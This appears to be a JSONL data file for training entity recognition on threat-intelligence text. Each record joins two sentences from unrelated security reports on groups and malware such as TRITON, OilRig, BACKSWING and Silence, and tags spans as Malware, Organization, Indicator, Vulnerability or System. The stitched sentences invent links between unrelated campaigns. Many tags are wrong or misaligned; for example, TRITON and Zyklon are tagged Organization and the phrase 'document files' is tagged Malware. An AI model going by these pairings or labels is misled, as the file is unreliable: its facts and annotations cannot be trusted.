{"text": "The document files exploit at least three known vulnerabilities in Microsoft Office , which we discuss in the Infection Techniques section . In fact , REDBALDKNIGHT has been targeting Japan as early as 2008 , based on the file properties of the decoy documents they've been sending to their targets .", "spans": [{"start": 4, "end": 18, "label": "Malware"}, {"start": 48, "end": 63, "label": "Vulnerability"}, {"start": 151, "end": 164, "label": "Organization"}, {"start": 245, "end": 260, "label": "Indicator"}]}
{"text": "Figure 2: Zyklon attack flowInfection Techniques CVE-2017-8759 . In fact , REDBALDKNIGHT has been zeroing in on Japanese organizations as early as 2008 \u2014 at least based on the file properties of the decoy documents they've been sending to their targets .", "spans": [{"start": 10, "end": 16, "label": "Organization"}, {"start": 49, "end": 62, "label": "Vulnerability"}, {"start": 75, "end": 88, "label": "Organization"}, {"start": 199, "end": 214, "label": "Indicator"}]}
{"text": "This vulnerability was discovered by FireEye in September 2017 , and it is a vulnerability we have observed being exploited in the wild . Carbanak is a backdoor used by the attackers to compromise the victim .", "spans": [{"start": 5, "end": 18, "label": "Vulnerability"}, {"start": 37, "end": 44, "label": "Organization"}, {"start": 138, "end": 146, "label": "Indicator"}, {"start": 152, "end": 160, "label": "Malware"}, {"start": 173, "end": 182, "label": "Organization"}]}
{"text": "We have observed this recent wave of Zyklon malware being delivered primarily through spam emails . This Gorgon Group campaign leveraged spear phishing emails with Microsoft Word documents exploiting CVE-2017-0199 .", "spans": [{"start": 37, "end": 43, "label": "Organization"}, {"start": 86, "end": 97, "label": "System"}, {"start": 152, "end": 158, "label": "System"}, {"start": 164, "end": 188, "label": "Indicator"}, {"start": 200, "end": 213, "label": "Vulnerability"}]}
{"text": "The malware may communicate with its command and control (C2) server over The Onion Router (Tor) network if configured to do so . The Korean-language Word document manual.doc appeared in Vietnam on January 17 , with the original author name of Honeybee .", "spans": [{"start": 4, "end": 11, "label": "Malware"}, {"start": 150, "end": 163, "label": "Malware"}, {"start": 164, "end": 174, "label": "Indicator"}, {"start": 244, "end": 252, "label": "Organization"}]}
{"text": "Figure 3: Embedded URL in OLE object CVE-2017-11882 Similarly , we have also observed actors leveraging another recently discovered vulnerability (CVE-2017-11882) in Microsoft Office . This malicious document contains a Visual Basic macro that dropped and executed an upgraded version of the implant known as SYSCON , which appeared in 2017 in malicious Word documents as part of several campaigns using North Korea\u2013related topics .", "spans": [{"start": 37, "end": 51, "label": "Vulnerability"}, {"start": 86, "end": 92, "label": "Organization"}, {"start": 146, "end": 162, "label": "Vulnerability"}, {"start": 309, "end": 315, "label": "Malware"}, {"start": 344, "end": 368, "label": "Indicator"}]}
{"text": "It follows Stuxnet which was used against Iran in 2010 and Industroyer which we believe was deployed by Sandworm Team against Ukraine in 2016 . Ke3chang has also leveraged a Java zero-day vulnerability ( CVE-2012-4681 ) , as well as older , reliable exploits for Microsoft Word ( CVE-2010-3333 ) and Adobe PDF Reader ( CVE-2010-2883 ) .", "spans": [{"start": 104, "end": 112, "label": "Organization"}, {"start": 144, "end": 152, "label": "Organization"}, {"start": 174, "end": 178, "label": "System"}, {"start": 179, "end": 187, "label": "Vulnerability"}, {"start": 204, "end": 217, "label": "Vulnerability"}, {"start": 263, "end": 277, "label": "Indicator"}, {"start": 280, "end": 293, "label": "Vulnerability"}, {"start": 300, "end": 316, "label": "Malware"}, {"start": 319, "end": 332, "label": "Vulnerability"}]}
{"text": "Command & Control Communication The C2 communication of Zyklon is proxied through the Tor network . For example , DeltaAlfa specifies a DDoS bot family identified as Alfa .", "spans": [{"start": 56, "end": 62, "label": "Organization"}, {"start": 86, "end": 97, "label": "System"}, {"start": 114, "end": 123, "label": "Indicator"}, {"start": 136, "end": 144, "label": "Malware"}]}
{"text": "At this time of writing , FireEye Multi Vector Execution (MVX) engine is able to recognize and block this threat . This alert 's IOC files provide HIDDEN COBRA indicators related to FALLCHILL .", "spans": [{"start": 26, "end": 33, "label": "Organization"}, {"start": 57, "end": 62, "label": "System"}, {"start": 129, "end": 138, "label": "Indicator"}, {"start": 147, "end": 159, "label": "Organization"}, {"start": 182, "end": 191, "label": "Malware"}]}
{"text": "The targeting of critical infrastructure to disrupt , degrade , or destroy systems is consistent with numerous attack and reconnaissance activities carried out globally by Russian , Iranian , North Korean , U.S. , and Israeli nation state actors . The McAfee Advanced Threat Research team discovered a previously unknown data-gathering implant that surfaced in mid-February 2018 .", "spans": [{"start": 17, "end": 40, "label": "Organization"}, {"start": 239, "end": 245, "label": "Organization"}, {"start": 252, "end": 283, "label": "Organization"}, {"start": 321, "end": 343, "label": "Indicator"}]}
{"text": "Specifically , the following facts support this assessment: The attacker targeted the SIS suggesting an interest in causing a high-impact attack with physical consequences . This alert 's IOC files provide HIDDEN COBRA indicators related to FALLCHILL .", "spans": [{"start": 64, "end": 72, "label": "Organization"}, {"start": 188, "end": 197, "label": "Indicator"}, {"start": 206, "end": 218, "label": "Organization"}, {"start": 241, "end": 250, "label": "Malware"}]}
{"text": "First , the attacker\u2019s mission is to disrupt an operational process rather than steal data . The McAfee Advanced Threat Research team discovered a previously unknown data-gathering implant that surfaced in mid-February 2018 .", "spans": [{"start": 12, "end": 22, "label": "Organization"}, {"start": 97, "end": 128, "label": "Organization"}, {"start": 166, "end": 188, "label": "Indicator"}]}
{"text": "The TRITON malware contained the capability to communicate with Triconex SIS controllers . Documents with the flash exploit managed to evade static defenses and remain undetected as an exploit on VirusTotal .", "spans": [{"start": 4, "end": 18, "label": "System"}, {"start": 91, "end": 100, "label": "Indicator"}, {"start": 110, "end": 115, "label": "System"}, {"start": 116, "end": 123, "label": "Vulnerability"}, {"start": 185, "end": 192, "label": "Vulnerability"}, {"start": 196, "end": 206, "label": "System"}]}
{"text": "the attacker did not leverage all of TRITON\u2019s extensive reconnaissance capabilities . This malware report contains analysis of one 32-bit Windows executable file , identified as a Remote Access Trojan ( RAT ) .", "spans": [{"start": 4, "end": 12, "label": "Organization"}, {"start": 37, "end": 45, "label": "Organization"}, {"start": 131, "end": 161, "label": "Indicator"}, {"start": 180, "end": 200, "label": "Malware"}, {"start": 203, "end": 206, "label": "Malware"}]}
{"text": "This file is decrypted and injected into an instance of InstallUtiil.exe , and functions as a Tor anonymizer . In one of the samples received for analysis , the US-CERT Code Analysis Team observed botnet controller functionality .", "spans": [{"start": 56, "end": 72, "label": "Malware"}, {"start": 94, "end": 97, "label": "Malware"}, {"start": 98, "end": 108, "label": "Malware"}, {"start": 161, "end": 187, "label": "Organization"}, {"start": 197, "end": 214, "label": "Indicator"}]}
{"text": "For instance , Russian operators , such as Sandworm Team , have compromised Western ICS over a multi-year period without causing a disruption . Volgmer payloads have been observed in 32-bit form as either executables or dynamic-link library ( .dll )", "spans": [{"start": 43, "end": 51, "label": "Organization"}, {"start": 144, "end": 151, "label": "Malware"}, {"start": 220, "end": 240, "label": "System"}, {"start": 243, "end": 247, "label": "Indicator"}]}
{"text": "The TRITON sample Mandiant analyzed added an attacker-provided program to the execution table of the Triconex controller . Trend Micro endpoint solutions such as Trend Micro\u2122 Smart Protection Suites and Worry-Free\u2122 Business Security can protect users and businesses from these threats by detecting malicious files and spammed messages as well as blocking all related malicious URLs .", "spans": [{"start": 4, "end": 10, "label": "Organization"}, {"start": 18, "end": 26, "label": "Organization"}, {"start": 101, "end": 120, "label": "System"}, {"start": 123, "end": 134, "label": "Organization"}, {"start": 162, "end": 198, "label": "Organization"}, {"start": 203, "end": 232, "label": "Organization"}, {"start": 255, "end": 265, "label": "Organization"}, {"start": 298, "end": 313, "label": "Indicator"}]}
{"text": "Along with the executable , two binary files , inject.bin (malicious function code) and imain.bin (malicious control logic) , were deployed as the controller\u2019s payload . WannaCry appends encrypted data files with the .WCRY extension , drops and executes a decryptor tool , and demands $300 or $600 USD ( via Bitcoin ) to decrypt the data .", "spans": [{"start": 32, "end": 44, "label": "Malware"}, {"start": 88, "end": 97, "label": "Malware"}, {"start": 170, "end": 178, "label": "Malware"}, {"start": 217, "end": 222, "label": "Indicator"}, {"start": 308, "end": 315, "label": "System"}]}
{"text": "We assess that this was an anti-forensics technique to hide the presence of the attacker code on the Triconex controller . Some of the documents exploited CVE-2017-0199 to deliver the payload .", "spans": [{"start": 80, "end": 88, "label": "Organization"}, {"start": 101, "end": 120, "label": "System"}, {"start": 135, "end": 144, "label": "Indicator"}, {"start": 155, "end": 168, "label": "Vulnerability"}]}
{"text": "This entry was posted on Thu Dec 14 10:00 EST 2017 and filed under Malware , Nathan Brubaker , Christopher Glyer , Blake Johnson , Dan Caban , Marina Krotofil , ICS Security , and Dan Scali . The Leviathan also occasionally used macro-laden Microsoft Word documents to target other US research and development organizations during this period .", "spans": [{"start": 161, "end": 173, "label": "Organization"}, {"start": 196, "end": 205, "label": "Organization"}, {"start": 229, "end": 265, "label": "Indicator"}, {"start": 298, "end": 323, "label": "Organization"}]}
{"text": "This isn\u2019t a bad thing as it shows a natural grouping of nodes that could be a good candidate to group to help simplify the overall graph and make analysis easier . The download name was \" Zawgyi_Keyboard_L.zip \" , and it dropped a \" setup.exe \" that contained several backdoor components , including an Elise \" wincex.dll \" ( a42c966e26f3577534d03248551232f3 , detected as Backdoor.Win32.Agent.delp ) .", "spans": [{"start": 26, "end": 28, "label": "Malware"}, {"start": 111, "end": 137, "label": "Malware"}, {"start": 142, "end": 162, "label": "Malware"}, {"start": 189, "end": 210, "label": "Indicator"}, {"start": 234, "end": 243, "label": "Indicator"}, {"start": 304, "end": 309, "label": "Malware"}, {"start": 312, "end": 322, "label": "Indicator"}, {"start": 327, "end": 359, "label": "Indicator"}, {"start": 374, "end": 399, "label": "Malware"}]}
{"text": "Keeping in mind the sensitivity of passwords , GoCrack includes an entitlement-based system that prevents users from accessing task data unless they are the original creator or they grant additional users to the task . Both attachments are malicious Word documents that attempt to exploit the Windows OLE Automation Array Remote Code Execution Vulnerability tracked by CVE-2014-6332 .", "spans": [{"start": 47, "end": 54, "label": "Organization"}, {"start": 188, "end": 204, "label": "Organization"}, {"start": 240, "end": 264, "label": "Indicator"}, {"start": 281, "end": 288, "label": "Vulnerability"}, {"start": 293, "end": 300, "label": "System"}, {"start": 301, "end": 343, "label": "System"}, {"start": 344, "end": 357, "label": "Vulnerability"}, {"start": 369, "end": 382, "label": "Vulnerability"}]}
{"text": "Throughout 2017 , we observed two versions of BACKSWING and saw a significant increase in May with an apparent focus on compromising Ukrainian websites . To set up persistence , the loader writes a file to \" c:\\temp\\rr.exe \" and executes it with specific command line arguments to create auto run registry keys .", "spans": [{"start": 46, "end": 55, "label": "System"}, {"start": 208, "end": 222, "label": "Indicator"}]}
{"text": "During our investigation into the activity , FireEye identified a direct overlap between BADRABBIT redirect sites and sites hosting a profiler we\u2019ve been tracking as BACKSWING . The Magic Hound campaign was also discovered using a custom dropper tool , which we have named MagicHound.DropIt .", "spans": [{"start": 45, "end": 52, "label": "Organization"}, {"start": 89, "end": 98, "label": "Malware"}, {"start": 166, "end": 175, "label": "System"}, {"start": 231, "end": 245, "label": "Malware"}, {"start": 273, "end": 290, "label": "Indicator"}]}
{"text": "This entry was posted on Tue Nov 28 14:00 EST 2017 and filed under Malware , Sandor Nemes , Malware Analysis , and Abhay Vaish . For example , we analyzed a DropIt sample ( SHA256 : cca268c13885ad5751eb70371bbc9ce8c8795654fedb90d9e3886cbcfe323671 ) that dropped two executables , one of which was saved to \" %TEMP%\\flash_update.exe \" that was a legitimate Flash Player installer .", "spans": [{"start": 77, "end": 89, "label": "System"}, {"start": 92, "end": 108, "label": "System"}, {"start": 115, "end": 126, "label": "System"}, {"start": 157, "end": 163, "label": "Malware"}, {"start": 182, "end": 246, "label": "Indicator"}, {"start": 308, "end": 331, "label": "Indicator"}, {"start": 356, "end": 378, "label": "Malware"}]}
{"text": "FireEye network devices blocked infection attempts at over a dozen victims primarily in Germany , Japan , and the U.S until Oct. 24 at 15:00 UTC , when the infection attempts ceased and attacker infrastructure \u2013 both 1dnscontrol.com and the legitimate websites containing the rogue code \u2013 were taken offline . During a recent campaign , APT32 leveraged social engineering emails with Microsoft ActiveMime file attachments to deliver malicious macros .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 186, "end": 194, "label": "Organization"}, {"start": 337, "end": 342, "label": "Organization"}, {"start": 372, "end": 378, "label": "System"}, {"start": 384, "end": 409, "label": "Indicator"}]}
{"text": "Incident Background Beginning on Oct. 24 at 08:00 UTC , FireEye detected and blocked attempts to infect multiple clients with a drive-by download masquerading as a Flash Update install_flash_player.exe that delivered a wormable variant of ransomware . The HTA files contained job descriptions and links to job postings on popular employment websites .", "spans": [{"start": 56, "end": 63, "label": "Organization"}, {"start": 177, "end": 201, "label": "Malware"}, {"start": 239, "end": 249, "label": "Malware"}, {"start": 256, "end": 265, "label": "Indicator"}]}
{"text": "FireEye observed that BACKSWING , a malicious JavaScript profiling framework , was deployed to at least 54 legitimate sites starting as early as September 2016 . These emails included recruitment-themed lures and links to malicious HTML Application ( HTA ) files .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 57, "end": 76, "label": "System"}, {"start": 168, "end": 174, "label": "System"}, {"start": 232, "end": 248, "label": "System"}, {"start": 251, "end": 254, "label": "System"}]}
{"text": "Figure 3: BACKSWING Version 2Version 1:FireEye observed the first version of BACKSWING in late 2016 on websites belonging to a Czech Republic hospitality organization in addition to a government website in Montenegro . POWRUNER was delivered using a malicious RTF file that exploited CVE-2017-0199 .", "spans": [{"start": 37, "end": 46, "label": "Organization"}, {"start": 77, "end": 86, "label": "Malware"}, {"start": 142, "end": 166, "label": "Organization"}, {"start": 184, "end": 194, "label": "Organization"}, {"start": 219, "end": 227, "label": "Malware"}, {"start": 260, "end": 268, "label": "Indicator"}, {"start": 284, "end": 297, "label": "Vulnerability"}]}
{"text": "Beginning in May 2017 , FireEye observed a number of Ukrainian websites compromised with BACKSWING v1 , and in June 2017 , began to see content returned from BACKSWING receivers . ChopShop1 is a new framework developed by the MITRE Corporation for network-based protocol decoders that enable security professionals to understand actual commands issued by human operators controlling endpoints .", "spans": [{"start": 24, "end": 31, "label": "Organization"}, {"start": 89, "end": 101, "label": "Organization"}, {"start": 158, "end": 167, "label": "Organization"}, {"start": 180, "end": 189, "label": "Indicator"}, {"start": 226, "end": 243, "label": "Organization"}]}
{"text": "FireEye observed this framework on compromised Turkish sites and Montenegrin sites over the past year . Attachments are typically sent as an executable file embedded in a ZIP archive or a password-protected Microsoft Office document .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 104, "end": 115, "label": "Indicator"}]}
{"text": "While FireEye has not directly observed BACKSWING delivering BADRABBIT , BACKSWING was observed on multiple websites that were seen referring FireEye customers to 1dnscontrol.com , which hosted the BADRABBIT dropper . This blog post analyzes several recent Molerats attacks that deployed PIVY against targets in the Middle East and in the U.S. We also examine additional PIVY attacks that leverage Arabic-language content related to the ongoing crisis in Egypt and the wider Middle East to lure targets into opening malicious files .", "spans": [{"start": 6, "end": 13, "label": "Organization"}, {"start": 40, "end": 49, "label": "Organization"}, {"start": 61, "end": 70, "label": "Malware"}, {"start": 73, "end": 82, "label": "Organization"}, {"start": 142, "end": 149, "label": "Organization"}, {"start": 198, "end": 215, "label": "Malware"}, {"start": 288, "end": 292, "label": "Malware"}, {"start": 516, "end": 531, "label": "Indicator"}]}
{"text": "Harvested credentials provided by an embedded Mimikatz executable facilitate the infection of other systems on the network . The archive contains an .exe file , sometimes disguised as a Microsoft Word file , a video , or another file format , using the corresponding icon .", "spans": [{"start": 46, "end": 54, "label": "Malware"}, {"start": 149, "end": 158, "label": "Indicator"}, {"start": 186, "end": 205, "label": "Indicator"}]}
{"text": "Like EternalPetya , infpub.dat determines if a specific file exists on the system and will exit if found . The Palo Alto Networks Unit 42 research team recently came across a series of malicious files which were almost identical to those targeting the Saudi Arabian government previously discussed by MalwareBytes .", "spans": [{"start": 20, "end": 30, "label": "Malware"}, {"start": 47, "end": 60, "label": "Malware"}, {"start": 111, "end": 137, "label": "Organization"}, {"start": 185, "end": 200, "label": "Indicator"}, {"start": 266, "end": 276, "label": "Organization"}, {"start": 301, "end": 313, "label": "Organization"}]}
{"text": "This entry was posted on Mon Dec 04 12:00 EST 2017 and filed under Code , Reverse Engineering , Nick Harbour , and Incident Response . We found new variants of the Powermud backdoor , a new backdoor ( Backdoor.Powemuddy ) , and custom tools for stealing passwords , creating reverse shells , privilege escalation , and the use of the native Windows cabinet creation tool , makecab.exe , probably for compressing stolen data to be uploaded .", "spans": [{"start": 5, "end": 10, "label": "Malware"}, {"start": 74, "end": 93, "label": "System"}, {"start": 96, "end": 108, "label": "System"}, {"start": 164, "end": 181, "label": "Malware"}, {"start": 201, "end": 219, "label": "Malware"}, {"start": 228, "end": 240, "label": "Malware"}, {"start": 341, "end": 348, "label": "System"}, {"start": 373, "end": 384, "label": "Indicator"}]}
{"text": "Mimikatz is a post-exploitation tool that allows attackers to extract credentials from volatile memory . Analysts in our DeepSight Managed Adversary and Threat Intelligence ( MATI ) team have found a new backdoor , Backdoor.Powemuddy , new variants of Seedworm 's Powermud backdoor ( aka POWERSTATS ) , a GitHub repository used by the group to store their scripts , as well as several post-compromise tools the group uses to exploit victims once they have established a foothold in their network .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 62, "end": 81, "label": "Malware"}, {"start": 121, "end": 172, "label": "Organization"}, {"start": 175, "end": 179, "label": "Organization"}, {"start": 215, "end": 233, "label": "Indicator"}, {"start": 252, "end": 260, "label": "Organization"}, {"start": 264, "end": 281, "label": "Indicator"}, {"start": 288, "end": 298, "label": "Malware"}, {"start": 425, "end": 432, "label": "Vulnerability"}]}
{"text": "The developer consistently used Accept-Enconding\u201d (note the extra \u2018n\u2019) in all DanBot samples analyzed by CTU researchers . Like the previous campaigns , these samples again involve a Microsoft Word document embedded with a malicious macro that is capable of executing PowerShell ( PS ) scripts leading to a backdoor payload .", "spans": [{"start": 78, "end": 84, "label": "Malware"}, {"start": 105, "end": 108, "label": "Organization"}, {"start": 183, "end": 197, "label": "System"}, {"start": 268, "end": 278, "label": "System"}, {"start": 281, "end": 283, "label": "System"}]}
{"text": "Previous versions were described by Kaspersky in 2014 and Cylance in 2017 . In May 2018 , Trend Micro found a new sample ( Detected as W2KM_DLOADR.UHAOEEN ) that may be related to this campaign .", "spans": [{"start": 0, "end": 17, "label": "Malware"}, {"start": 36, "end": 45, "label": "Organization"}, {"start": 58, "end": 65, "label": "Organization"}, {"start": 90, "end": 101, "label": "Organization"}, {"start": 135, "end": 154, "label": "Malware"}]}
{"text": "The GoogleUpdate.exe component is responsible for communicating with the remote C&C server . In May 2018 , Trend Micro found a new sample ( Detected as W2KM_DLOADR.UHAOEEN ) that may be related to this campaign .", "spans": [{"start": 4, "end": 20, "label": "Malware"}, {"start": 50, "end": 63, "label": "Malware"}, {"start": 107, "end": 118, "label": "Organization"}, {"start": 152, "end": 171, "label": "Malware"}]}
{"text": "This way , the malware can have its configuration , malicious binaries and file listings updated , but can also download and execute other binaries . This bait document , or email attachment , appears to be a standard Word document , but is in fact an CVE-2012-0158 exploit , an executable with a double extension , or an executable with an RTLO filename , so it can execute code without the user 's knowledge or consent .", "spans": [{"start": 15, "end": 22, "label": "Malware"}, {"start": 36, "end": 49, "label": "Malware"}, {"start": 112, "end": 120, "label": "Malware"}, {"start": 125, "end": 132, "label": "Malware"}, {"start": 155, "end": 168, "label": "Indicator"}, {"start": 218, "end": 222, "label": "System"}, {"start": 252, "end": 265, "label": "Vulnerability"}, {"start": 266, "end": 273, "label": "Vulnerability"}]}
{"text": "They also download apks secretly and record audios and videos , then upload users\u2019 privacy information to server , causing users\u2019 privacy leakage . Taking a step back , as discussed in the Appendix in our initial OilRig blog , Clayslide delivery documents initially open with a worksheet named \" Incompatible \" that displays content that instructs the user to \" Enable Content \" to see the contents of the document , which in fact runs the malicious macro and compromises the system .", "spans": [{"start": 0, "end": 4, "label": "Malware"}, {"start": 10, "end": 18, "label": "Malware"}, {"start": 24, "end": 32, "label": "Malware"}, {"start": 37, "end": 50, "label": "Malware"}, {"start": 69, "end": 75, "label": "Malware"}, {"start": 213, "end": 219, "label": "Organization"}, {"start": 227, "end": 255, "label": "Indicator"}]}
{"text": "The SectorJ04 group mainly utilizes a spear phishing email with MS Word or Excel files attached , and the document files downloads the Microsoft Installer (MSI) installation file from the attacker server and uses it to install backdoor on the infected system . The backdoor was delivered via a malicious .rtf file that exploited CVE-2017-0199 .", "spans": [{"start": 4, "end": 13, "label": "Organization"}, {"start": 106, "end": 120, "label": "Malware"}, {"start": 121, "end": 130, "label": "Malware"}, {"start": 188, "end": 196, "label": "Organization"}, {"start": 304, "end": 313, "label": "Indicator"}, {"start": 329, "end": 342, "label": "Vulnerability"}]}
{"text": "Backdoor installed in the infected system distributed additional botnet malware , ransomware and email stealers . The vulnerability exists in the old Equation Editor ( EQNEDT32.EXE ) , a component of Microsoft Office that is used to insert and evaluate mathematical formulas .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 150, "end": 165, "label": "Malware"}, {"start": 168, "end": 180, "label": "Indicator"}, {"start": 200, "end": 209, "label": "Organization"}]}
{"text": "The email stealer collects connection protocol information and account information , such as SMTP , IMAP , and POP3 , which are stored in the registry by Outlook and Thunderbird mail clients and sends them to the attacker server in a specific format . The January 8 attack used a variant of the ThreeDollars delivery document , which we identified as part of the OilRig toolset based on attacks that occurred in August 2017 .", "spans": [{"start": 4, "end": 17, "label": "Malware"}, {"start": 18, "end": 37, "label": "Malware"}, {"start": 295, "end": 325, "label": "Indicator"}, {"start": 363, "end": 369, "label": "Organization"}]}
{"text": "The threat actor\u2019s emails usually contain a picture or a link without a malicious payload and are sent out to a huge recipient database of up to 85 , 000 users . The email contained an attachment named Seminar-Invitation.doc , which is a malicious Microsoft Word document we track as ThreeDollars .", "spans": [{"start": 11, "end": 18, "label": "Organization"}, {"start": 72, "end": 89, "label": "Malware"}, {"start": 154, "end": 159, "label": "Organization"}, {"start": 202, "end": 224, "label": "Indicator"}, {"start": 248, "end": 262, "label": "System"}, {"start": 284, "end": 296, "label": "Malware"}]}
{"text": "Group-IB has also detected recon emails sent out to New Zealand . We also identified another sample of ThreeDollars , created on January 15 , 2017 with the file name strategy preparation.dot .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 27, "end": 39, "label": "Malware"}, {"start": 103, "end": 115, "label": "Malware"}, {"start": 175, "end": 190, "label": "Indicator"}]}
{"text": "In 2019 , Group-IB also observed the use of a new fileless PowerShell loader called Ivoke . We had previously observed this author name in use once before , in the very first ThreeDollars document we collected that we had reported on in August 2017 .", "spans": [{"start": 10, "end": 18, "label": "Organization"}, {"start": 84, "end": 89, "label": "Malware"}, {"start": 175, "end": 196, "label": "Indicator"}]}
{"text": "The Silence.Main Trojan , which is the main stage of the attack , has a full set of commands to control a compromised computer . The June 2017 sample of Clayslide contained the same OfficeServicesStatus.vbs file found in the ISMAgent Clayslide document , but instead of having the payload embedded in the macro as segregated base64 strings that would be concatenated , this variant obtained its payload from multiple cells within the \" Incompatible \" worksheet .", "spans": [{"start": 4, "end": 23, "label": "Malware"}, {"start": 96, "end": 103, "label": "Malware"}, {"start": 153, "end": 162, "label": "Malware"}, {"start": 182, "end": 211, "label": "Indicator"}, {"start": 225, "end": 252, "label": "Malware"}]}
{"text": "Group-IB specialists tracked a massive mailout of emails containing a malicious Microsoft Word attachment titled \u0414\u043e\u0433\u043e\u0432\u043e\u0440.doc\u201d [Contract.doc] . During this testing , we saw document filenames that contain the C2 we witnessed in the targeted attack above , specifically the filenames XLS-withyourface.xls and XLS-withyourface \u2013 test.xls .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 70, "end": 105, "label": "Malware"}, {"start": 208, "end": 210, "label": "System"}, {"start": 282, "end": 302, "label": "Indicator"}, {"start": 307, "end": 334, "label": "Indicator"}]}
{"text": "On 24 March 2019 , Silence.ProxyBot (MD5 2fe01a04d6beef14555b2cf9a717615c) was uploaded to VirusTotal from an IP address in Sri Lanka . These samples appeared to have been created by OilRig during their development and testing activities , all of which share many similarities with the delivery document used in the recent OilRig attack against a Middle Eastern government , N56.15.doc ( 7cbad6b3f505a199d6766a86b41ed23786bbb99dab9cae6c18936afdc2512f00 ) that we have also included in Table 1 .", "spans": [{"start": 19, "end": 35, "label": "Malware"}, {"start": 183, "end": 189, "label": "Organization"}, {"start": 323, "end": 336, "label": "Organization"}, {"start": 362, "end": 372, "label": "Organization"}, {"start": 375, "end": 385, "label": "Indicator"}, {"start": 388, "end": 452, "label": "Indicator"}]}
{"text": "To do this , the actor may have used a unique tool called Atmosphere , a Trojan developed by Silence to remotely control ATM dispensers , or a similar program called xfs-disp.exe , which the actor may have used in their attack on IT Bank . The attackers sent multiple emails containing macro-enabled XLS files to employees working in the banking sector in the Middle East .", "spans": [{"start": 58, "end": 68, "label": "System"}, {"start": 93, "end": 100, "label": "Organization"}, {"start": 166, "end": 178, "label": "Malware"}, {"start": 233, "end": 237, "label": "Organization"}, {"start": 244, "end": 253, "label": "Organization"}, {"start": 268, "end": 274, "label": "System"}, {"start": 300, "end": 309, "label": "Indicator"}, {"start": 313, "end": 352, "label": "Organization"}]}
{"text": "The main goal of Silence.Downloader is to receive an executable file and run it on an infected machine . In the first week of May 2016 , FireEye 's DTI identified a wave of emails containing malicious attachments being sent to multiple banks in the Middle East region .", "spans": [{"start": 17, "end": 35, "label": "Malware"}, {"start": 42, "end": 49, "label": "Malware"}, {"start": 137, "end": 151, "label": "Organization"}, {"start": 173, "end": 179, "label": "System"}, {"start": 191, "end": 212, "label": "Indicator"}, {"start": 236, "end": 241, "label": "Organization"}]}
{"text": "Silence.MainModule is a typical remote control Trojan that provides access to the command shell CMD.EXE with the possibility of downloading files from remote nodes to a computer and uploading files from a computer to a remote server . Their next move was to list any remote shared drives and then attempt to access remote shares owned by the specific government office they were targeting , again attempting to extract all Word documents .", "spans": [{"start": 0, "end": 18, "label": "Malware"}, {"start": 59, "end": 67, "label": "Malware"}, {"start": 96, "end": 103, "label": "Malware"}, {"start": 128, "end": 145, "label": "Malware"}, {"start": 182, "end": 197, "label": "Malware"}, {"start": 351, "end": 368, "label": "Organization"}, {"start": 423, "end": 437, "label": "Indicator"}]}
{"text": "Rapid7 again observed APT10 dropping payloads named ccSEUPDT.exe . For example , in September 2016 , Sowbug infiltrated an organization in Asia , deploying the Felismus backdoor on one of its computers , Computer A , using the file name adobecms.exe in CSIDL_WINDOWS\\debug .", "spans": [{"start": 0, "end": 6, "label": "Organization"}, {"start": 22, "end": 27, "label": "Organization"}, {"start": 52, "end": 64, "label": "Malware"}, {"start": 101, "end": 107, "label": "Organization"}, {"start": 160, "end": 177, "label": "Malware"}, {"start": 237, "end": 249, "label": "Indicator"}, {"start": 253, "end": 272, "label": "Indicator"}]}
{"text": "These malware families have a rich history of being used in many targeted attacks against government and private organizations . Symantec has found evidence of Starloader files being named AdobeUpdate.exe , AcrobatUpdate.exe , and INTELUPDATE.EXE among others .", "spans": [{"start": 6, "end": 13, "label": "Malware"}, {"start": 90, "end": 100, "label": "Organization"}, {"start": 105, "end": 112, "label": "Organization"}, {"start": 113, "end": 126, "label": "Organization"}, {"start": 129, "end": 137, "label": "Organization"}, {"start": 160, "end": 176, "label": "Indicator"}, {"start": 189, "end": 204, "label": "Indicator"}, {"start": 207, "end": 224, "label": "Indicator"}, {"start": 231, "end": 246, "label": "Indicator"}]}
{"text": "The samples we analyzed originated from the Philippines . The attackers then began to perform reconnaissance activities on Computer A via cmd.exe , collecting system-related information , such as the OS version , hardware configuration , and network information .", "spans": [{"start": 4, "end": 11, "label": "Malware"}, {"start": 138, "end": 145, "label": "Indicator"}]}
{"text": "Also , the certificate embedded in the Quasar sample was issued at 22.12.2018 , which correlates with the file\u2019s compilation date . In September 2015 , Kaspersky Lab 's Anti-Targeted Attack Platform discovered anomalous network traffic in a government organization network .", "spans": [{"start": 46, "end": 52, "label": "Malware"}, {"start": 152, "end": 165, "label": "Organization"}, {"start": 210, "end": 235, "label": "Indicator"}, {"start": 241, "end": 264, "label": "Organization"}]}
{"text": "PlugX is a modular structured malware that has many different operational plugins such as communication compression and encryption , network enumeration , files interaction , remote shell operations and more . Symantec detects this threat as Backdoor.Nidiran .", "spans": [{"start": 0, "end": 5, "label": "Malware"}, {"start": 90, "end": 115, "label": "Malware"}, {"start": 120, "end": 130, "label": "Malware"}, {"start": 133, "end": 152, "label": "Malware"}, {"start": 155, "end": 172, "label": "Malware"}, {"start": 175, "end": 198, "label": "Malware"}, {"start": 210, "end": 218, "label": "Organization"}, {"start": 242, "end": 258, "label": "Indicator"}]}
{"text": "TONEDEAF supports collecting system information , uploading and downloading of files , and arbitrary shell command execution . Attackers have been known to distribute malicious files masquerading as the legitimate iviewers.dll file and then use DLL load hijacking to execute the malicious code and infect the computer .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 18, "end": 47, "label": "Malware"}, {"start": 50, "end": 59, "label": "Malware"}, {"start": 64, "end": 75, "label": "Malware"}, {"start": 91, "end": 100, "label": "Malware"}, {"start": 167, "end": 182, "label": "Indicator"}, {"start": 214, "end": 231, "label": "Malware"}, {"start": 245, "end": 263, "label": "Malware"}]}
{"text": "Of note , FireEye discovered two additional new malware families hosted at this domain , VALUEVAULT and LONGWATCH . Once exploit has been achieved , Nidiran is delivered through a self-extracting executable that extracts the components to a .tmp folder after it has been executed .", "spans": [{"start": 10, "end": 17, "label": "Organization"}, {"start": 89, "end": 99, "label": "Malware"}, {"start": 104, "end": 113, "label": "Malware"}, {"start": 121, "end": 128, "label": "Vulnerability"}, {"start": 149, "end": 156, "label": "Malware"}, {"start": 180, "end": 206, "label": "Malware"}, {"start": 241, "end": 245, "label": "Indicator"}]}
